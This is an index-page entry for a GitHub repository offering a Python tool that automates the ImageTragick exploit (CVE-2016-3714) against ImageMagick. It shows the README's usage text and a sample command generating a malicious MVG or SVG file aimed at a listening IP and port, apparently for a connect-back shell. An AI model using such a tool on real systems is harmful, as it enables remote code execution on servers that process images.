Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/pandh4cker/pandagik

Image Magick Exploit for CVE-2016–3714
https://github.com/pandh4cker/pandagik

exploit imagemagick python3 rce

Last synced: 18 days ago
JSON representation

Image Magick Exploit for CVE-2016–3714

Awesome Lists containing this project

README

        

# pandagik
## Author: [Raphael Dray](https://www.linkedin.com/in/raphaeldray/)
Image Magick Exploit (CVE-2016-3714) automated in Python 3.

### Usage:
```bash
❯ python3 pandagik.py -h
usage: pandagik.py [-h] (--mvg | --svg) LHOST LPORT

ImageTragick Exploit

positional arguments:
LHOST Listening IP
LPORT Listening Port

options:
-h, --help show this help message and exit

File Type:
--mvg MVG File
--svg SVG File
```

You can either generate a MVG (`--mvg`) or a SVG (`--svg`):
```bash
python3 pandagik.py --mvg 192.168.13.37 1337
```